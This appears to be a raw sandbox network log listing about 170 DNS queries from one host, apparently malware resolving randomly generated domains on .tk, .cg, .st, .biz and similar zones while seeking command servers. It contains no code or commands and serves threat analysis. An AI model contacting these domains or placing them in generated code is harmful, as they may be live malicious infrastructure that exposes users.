                                                                                                                                                                    Sep 7, 2024 15:37:25.728461027 CEST192.168.2.121.1.1.10x308aStandard query (0)isfusus-omoab.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:25.775300980 CEST192.168.2.121.1.1.10xc15bStandard query (0)twpuaka.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:25.979629040 CEST192.168.2.121.1.1.10x6a59Standard query (0)kymbskiyz.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:26.165893078 CEST192.168.2.121.1.1.10x2f1bStandard query (0)suouopcjnawo.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:26.463061094 CEST192.168.2.121.1.1.10xd273Standard query (0)cluscsyyo.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:26.666517019 CEST192.168.2.121.1.1.10xa793Standard query (0)ciybns.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:26.933391094 CEST192.168.2.121.1.1.10xa793Standard query (0)ciybns.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:26.979053974 CEST192.168.2.121.1.1.10xfafcStandard query (0)muaegbsooqxp.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:27.043068886 CEST192.168.2.121.1.1.10xccaeStandard query (0)yjyitmswi.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:27.087517023 CEST192.168.2.121.1.1.10x6f8Standard query (0)eckmwoiaaor.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:27.337121964 CEST192.168.2.121.1.1.10x6f8Standard query (0)eckmwoiaaor.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:27.387016058 CEST192.168.2.121.1.1.10x8f1bStandard query (0)xwygeqmmxmx.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:27.478125095 CEST192.168.2.121.1.1.10xe6f7Standard query (0)yoayaww.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:27.510093927 CEST192.168.2.121.1.1.10xda10Standard query (0)exlfcsmiiud.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:27.572408915 CEST192.168.2.121.1.1.10x753Standard query (0)oedewqezngow.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:27.837244034 CEST192.168.2.121.1.1.10x753Standard query (0)oedewqezngow.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:28.087816954 CEST192.168.2.121.1.1.10xa8f2Standard query (0)eakaox.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:28.166419983 CEST192.168.2.121.1.1.10xee4aStandard query (0)gfwcr.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:28.353312016 CEST192.168.2.121.1.1.10xc118Standard query (0)eiqbyfu.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:28.618460894 CEST192.168.2.121.1.1.10xc118Standard query (0)eiqbyfu.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:28.651201963 CEST192.168.2.121.1.1.10x250cStandard query (0)kkuywpcad.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:28.915587902 CEST192.168.2.121.1.1.10x9d5aStandard query (0)mroimawg.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:29.180996895 CEST192.168.2.121.1.1.10x9d5aStandard query (0)mroimawg.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:29.212744951 CEST192.168.2.121.1.1.10x86eeStandard query (0)wnfsk.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:29.307167053 CEST192.168.2.121.1.1.10x2e04Standard query (0)moaeioafiysuu.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:29.443914890 CEST192.168.2.121.1.1.10x6d66Standard query (0)autwiyiygwsau.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:29.639012098 CEST192.168.2.121.1.1.10xb30fStandard query (0)npocceim.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:29.759684086 CEST192.168.2.121.1.1.10x507dStandard query (0)keqrykjykw.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:29.884362936 CEST192.168.2.121.1.1.10xdff6Standard query (0)woyqo.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:30.134299040 CEST192.168.2.121.1.1.10xdff6Standard query (0)woyqo.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:30.275453091 CEST192.168.2.121.1.1.10x6495Standard query (0)laumebejuxg.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:30.540323019 CEST192.168.2.121.1.1.10x6495Standard query (0)laumebejuxg.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:30.681471109 CEST192.168.2.121.1.1.10x7c0bStandard query (0)scmgqokmmsn.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:30.696805000 CEST192.168.2.121.1.1.10xa2e0Standard query (0)isfusus-omoab.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:30.728142023 CEST192.168.2.121.1.1.10xf3eeStandard query (0)cmsarcnhl.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:30.821935892 CEST192.168.2.121.1.1.10xe58dStandard query (0)xjaec.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:30.853020906 CEST192.168.2.121.1.1.10xf54aStandard query (0)argunoos.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:30.884294033 CEST192.168.2.121.1.1.10x4cbaStandard query (0)drupv.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:31.089247942 CEST192.168.2.121.1.1.10x3185Standard query (0)xmsucrbwebuxs.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:31.355066061 CEST192.168.2.121.1.1.10x3185Standard query (0)xmsucrbwebuxs.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:31.649962902 CEST192.168.2.121.1.1.10x9f0fStandard query (0)piulcuq.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:31.900788069 CEST192.168.2.121.1.1.10x9f0fStandard query (0)piulcuq.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:31.950345039 CEST192.168.2.121.1.1.10xa897Standard query (0)poqfexeyx.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:32.009546995 CEST192.168.2.121.1.1.10x5e3eStandard query (0)mdzlykq.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:32.056411982 CEST192.168.2.121.1.1.10xc6a8Standard query (0)azualgwaigk.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:32.259649038 CEST192.168.2.121.1.1.10x8f13Standard query (0)wwjsagvasav.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:32.533567905 CEST192.168.2.121.1.1.10x8f13Standard query (0)wwjsagvasav.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:32.588090897 CEST192.168.2.121.1.1.10x8c7dStandard query (0)mdjkgmimt.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:32.618810892 CEST192.168.2.121.1.1.10xb936Standard query (0)fcpnkowmo.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:32.900319099 CEST192.168.2.121.1.1.10xfd3eStandard query (0)irimyaqybdg.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:32.962625980 CEST192.168.2.121.1.1.10x228eStandard query (0)qdgiqwuzkfm.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:33.040843010 CEST192.168.2.121.1.1.10x878bStandard query (0)jfziaqsqc.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:33.212441921 CEST192.168.2.121.1.1.10x16bStandard query (0)cawak.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:33.259532928 CEST192.168.2.121.1.1.10x43c0Standard query (0)sezftyka.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:33.540617943 CEST192.168.2.121.1.1.10x6866Standard query (0)cuwma.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:33.603113890 CEST192.168.2.121.1.1.10x7b2fStandard query (0)kpkapbdggwm.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:33.877815008 CEST192.168.2.121.1.1.10x7b2fStandard query (0)kpkapbdggwm.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:33.915661097 CEST192.168.2.121.1.1.10xb5bdStandard query (0)hwkiipkg.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:33.978173971 CEST192.168.2.121.1.1.10xbf05Standard query (0)eyzmimmnoui.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:34.009592056 CEST192.168.2.121.1.1.10x9f03Standard query (0)ooqkiiphvrwom.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:34.040611029 CEST192.168.2.121.1.1.10xc193Standard query (0)wvklifx.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:34.087476969 CEST192.168.2.121.1.1.10xc198Standard query (0)afgnkjsxmwceu.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:34.184151888 CEST192.168.2.121.1.1.10x6a96Standard query (0)oaswzzqcdnsuo.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:34.228152990 CEST192.168.2.121.1.1.10x91a1Standard query (0)aminematjboxc.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:34.275064945 CEST192.168.2.121.1.1.10x2debStandard query (0)wcisyouzucuspa.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:34.340730906 CEST192.168.2.121.1.1.10x5879Standard query (0)eeqqiqwalqmcv.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:34.400578022 CEST192.168.2.121.1.1.10xc7ceStandard query (0)qanyrflqcqf.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:34.462538958 CEST192.168.2.121.1.1.10xaeebStandard query (0)ffdqo.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:34.666440964 CEST192.168.2.121.1.1.10x98c2Standard query (0)zpsmim.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:34.712866068 CEST192.168.2.121.1.1.10x7297Standard query (0)qaicmrm.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:34.777004957 CEST192.168.2.121.1.1.10x8a3dStandard query (0)esrsoysauve.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:35.024630070 CEST192.168.2.121.1.1.10x8a3dStandard query (0)esrsoysauve.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:35.290796041 CEST192.168.2.121.1.1.10x388aStandard query (0)owlye.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:35.337565899 CEST192.168.2.121.1.1.10x3240Standard query (0)qqkrexe.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:35.587316036 CEST192.168.2.121.1.1.10x3240Standard query (0)qqkrexe.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:35.728678942 CEST192.168.2.121.1.1.10xf6a4Standard query (0)gkokhds.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:35.759915113 CEST192.168.2.121.1.1.10x84a3Standard query (0)oaaobqjvmaaes.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:35.780853033 CEST192.168.2.121.1.1.10xb283Standard query (0)argunoos.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:35.806205034 CEST192.168.2.121.1.1.10x4052Standard query (0)aneyu.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:35.837429047 CEST192.168.2.121.1.1.10x129fStandard query (0)ewgdrscmqmvkf.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:36.024986982 CEST192.168.2.121.1.1.10xeb7aStandard query (0)wjmjuusyoir.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:36.088040113 CEST192.168.2.121.1.1.10x7c6Standard query (0)iignkaikyqge.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:36.150657892 CEST192.168.2.121.1.1.10xca22Standard query (0)saupsmyu.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:36.196842909 CEST192.168.2.121.1.1.10x2442Standard query (0)coykrvafpuizlk.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:36.243722916 CEST192.168.2.121.1.1.10x5ab5Standard query (0)mgimcuopg.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:36.306313038 CEST192.168.2.121.1.1.10xcbdfStandard query (0)ksacguagw.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:36.368907928 CEST192.168.2.121.1.1.10xc110Standard query (0)imuoqyzsiahmq.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:36.556591988 CEST192.168.2.121.1.1.10xbb88Standard query (0)cgofiwukfi.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:36.806638002 CEST192.168.2.121.1.1.10xbb88Standard query (0)cgofiwukfi.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:37.388035059 CEST192.168.2.121.1.1.10x5c80Standard query (0)nvxyg.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:37.431282043 CEST192.168.2.121.1.1.10x9541Standard query (0)muydgakodbgmas.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:37.680959940 CEST192.168.2.121.1.1.10x9541Standard query (0)muydgakodbgmas.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:37.775432110 CEST192.168.2.121.1.1.10xb0caStandard query (0)oxsci.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:37.837394953 CEST192.168.2.121.1.1.10x1ee2Standard query (0)ysxgpyeacok.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:38.087145090 CEST192.168.2.121.1.1.10x1ee2Standard query (0)ysxgpyeacok.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:38.806544065 CEST192.168.2.121.1.1.10xf4f3Standard query (0)ejakqqwmm.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:38.853301048 CEST192.168.2.121.1.1.10x4268Standard query (0)aiifvchllwocs.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:39.103149891 CEST192.168.2.121.1.1.10xf0eaStandard query (0)frhwpauimkctq.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:39.306473970 CEST192.168.2.121.1.1.10x9364Standard query (0)suwcign.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:39.340518951 CEST192.168.2.121.1.1.10x9216Standard query (0)cemglri.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:39.541410923 CEST192.168.2.121.1.1.10x906eStandard query (0)uygmyugsu.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:39.697451115 CEST192.168.2.121.1.1.10x1dfcStandard query (0)fkvea.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:39.775253057 CEST192.168.2.121.1.1.10x6cc3Standard query (0)ukumaum.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:40.025151968 CEST192.168.2.121.1.1.10x6cc3Standard query (0)ukumaum.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:40.118915081 CEST192.168.2.121.1.1.10xa9ddStandard query (0)smghg.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:40.212584019 CEST192.168.2.121.1.1.10x8941Standard query (0)vfugnlrfi.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:40.243768930 CEST192.168.2.121.1.1.10xfa65Standard query (0)arqypsrncako.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:40.290611029 CEST192.168.2.121.1.1.10xa06eStandard query (0)ixygkwcuam.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:40.478106022 CEST192.168.2.121.1.1.10x5801Standard query (0)koxkskupi.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:40.540760040 CEST192.168.2.121.1.1.10xcad6Standard query (0)kwoygbuesgr.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:40.804424047 CEST192.168.2.121.1.1.10xdb32Standard query (0)wjduwemoywk.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:41.055954933 CEST192.168.2.121.1.1.10xdb32Standard query (0)wjduwemoywk.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:41.118835926 CEST192.168.2.121.1.1.10x4748Standard query (0)mdnkpoy.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:41.381942987 CEST192.168.2.121.1.1.10x4748Standard query (0)mdnkpoy.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:41.431564093 CEST192.168.2.121.1.1.10xafcStandard query (0)iikosfkemhtfj.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:41.448874950 CEST192.168.2.121.1.1.10xfb0Standard query (0)argunoos.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:41.478822947 CEST192.168.2.121.1.1.10x9f2cStandard query (0)qclczlkmgu.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:41.524967909 CEST192.168.2.121.1.1.10x3427Standard query (0)ueypuiekc.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:41.557112932 CEST192.168.2.121.1.1.10x7adeStandard query (0)eolmuca.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:41.806370974 CEST192.168.2.121.1.1.10xddcbStandard query (0)awmeuaomjlwjey.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:41.993746042 CEST192.168.2.121.1.1.10xb68Standard query (0)qoxmucyiyk.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:42.025233030 CEST192.168.2.121.1.1.10xa7ffStandard query (0)cojngglbogs.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:42.212790966 CEST192.168.2.121.1.1.10x502aStandard query (0)smyaygwwihy.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:42.290607929 CEST192.168.2.121.1.1.10xb89cStandard query (0)ckcieayntl.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:42.542397022 CEST192.168.2.121.1.1.10xb89cStandard query (0)ckcieayntl.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:42.589649916 CEST192.168.2.121.1.1.10x59fStandard query (0)ofajqioc.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:42.790664911 CEST192.168.2.121.1.1.10x9ca5Standard query (0)chppyqkp.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:42.822679043 CEST192.168.2.121.1.1.10x55b9Standard query (0)jgyrybiwbku.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:42.868737936 CEST192.168.2.121.1.1.10x771eStandard query (0)iomml.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:42.931942940 CEST192.168.2.121.1.1.10xfd02Standard query (0)afqwvqq.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:43.134392977 CEST192.168.2.121.1.1.10x9b6Standard query (0)oaawhagap.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:43.408848047 CEST192.168.2.121.1.1.10x9b6Standard query (0)oaawhagap.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:43.712677956 CEST192.168.2.121.1.1.10xa3b4Standard query (0)wieizagwkeglef.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:43.918175936 CEST192.168.2.121.1.1.10x1ff7Standard query (0)pkger.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:43.947055101 CEST192.168.2.121.1.1.10xc609Standard query (0)uhorhlm.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:44.196561098 CEST192.168.2.121.1.1.10xc609Standard query (0)uhorhlm.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:44.696928024 CEST192.168.2.121.1.1.10x62e4Standard query (0)prhqe.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:44.728240967 CEST192.168.2.121.1.1.10xa9ccStandard query (0)dhseo.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:44.759340048 CEST192.168.2.121.1.1.10xbc33Standard query (0)yhisdjftdjv.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:45.024543047 CEST192.168.2.121.1.1.10xbc33Standard query (0)yhisdjftdjv.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:45.040726900 CEST192.168.2.121.1.1.10xbdbeStandard query (0)uiuqmrswwk.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:45.228821993 CEST192.168.2.121.1.1.10x2862Standard query (0)caoyaicceuy.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:45.353199005 CEST192.168.2.121.1.1.10x56a7Standard query (0)rrsmsoweqmg.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:45.619003057 CEST192.168.2.121.1.1.10x83edStandard query (0)ixqacabcwgv.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:45.806708097 CEST192.168.2.121.1.1.10x4b97Standard query (0)cqusows.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:45.823898077 CEST192.168.2.121.1.1.10x9152Standard query (0)argunoos.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:45.853333950 CEST192.168.2.121.1.1.10x1d75Standard query (0)fistxngyfbk.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:45.978446007 CEST192.168.2.121.1.1.10x357fStandard query (0)ebjcibsac.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:46.009324074 CEST192.168.2.121.1.1.10xd260Standard query (0)ojjgkbmissh.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:46.259011984 CEST192.168.2.121.1.1.10xd260Standard query (0)ojjgkbmissh.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:46.525270939 CEST192.168.2.121.1.1.10xdaccStandard query (0)wmqukxacykyoqu.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:46.571911097 CEST192.168.2.121.1.1.10x849Standard query (0)tqwoeqkl.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:46.618782997 CEST192.168.2.121.1.1.10xfb87Standard query (0)ergmpykfk.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:46.883940935 CEST192.168.2.121.1.1.10xfb87Standard query (0)ergmpykfk.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:46.915595055 CEST192.168.2.121.1.1.10x8987Standard query (0)gsyqguoocg.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:46.946763992 CEST192.168.2.121.1.1.10x1d4aStandard query (0)yocywwa.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:47.134356976 CEST192.168.2.121.1.1.10xeadStandard query (0)qgyjdmdoqrao.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:47.322073936 CEST192.168.2.121.1.1.10xd149Standard query (0)hqobekqdj.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:47.594590902 CEST192.168.2.121.1.1.10xd149Standard query (0)hqobekqdj.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:47.630119085 CEST192.168.2.121.1.1.10xad06Standard query (0)rpuva.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:47.669683933 CEST192.168.2.121.1.1.10x14bdStandard query (0)ghtmfguneugikd.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:47.712507010 CEST192.168.2.121.1.1.10x9592Standard query (0)wyzulxywhoklr.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:47.743748903 CEST192.168.2.121.1.1.10xe3a9Standard query (0)sktqevyq.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:47.791215897 CEST192.168.2.121.1.1.10x9d91Standard query (0)yaqvlqjmg.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:47.915704966 CEST192.168.2.121.1.1.10xe79cStandard query (0)teoswl.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:47.972986937 CEST192.168.2.121.1.1.10x5511Standard query (0)sglyvcgwgypkd.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:48.025372028 CEST192.168.2.121.1.1.10xef2dStandard query (0)fvtsygyunjoti.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:48.181451082 CEST192.168.2.121.1.1.10xe764Standard query (0)qpumzgsuyri.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:48.214719057 CEST192.168.2.121.1.1.10xc338Standard query (0)iweua.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:48.259454966 CEST192.168.2.121.1.1.10x39edStandard query (0)wlroqdc.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:48.290601969 CEST192.168.2.121.1.1.10x310dStandard query (0)momdc.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:48.368717909 CEST192.168.2.121.1.1.10x5d1cStandard query (0)mmcsna.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:48.618346930 CEST192.168.2.121.1.1.10x5d1cStandard query (0)mmcsna.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:49.056277037 CEST192.168.2.121.1.1.10x5a34Standard query (0)ieiymqgalwboa.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:49.118752003 CEST192.168.2.121.1.1.10xf3a6Standard query (0)aqcne.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:49.368491888 CEST192.168.2.121.1.1.10xf3a6Standard query (0)aqcne.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:49.640431881 CEST192.168.2.121.1.1.10xe47fStandard query (0)daqazsdync.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:49.681945086 CEST192.168.2.121.1.1.10xa434Standard query (0)ysoym.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:49.806188107 CEST192.168.2.121.1.1.10x2bdfStandard query (0)algbo.vgA (IP address)IN (0x0001)false
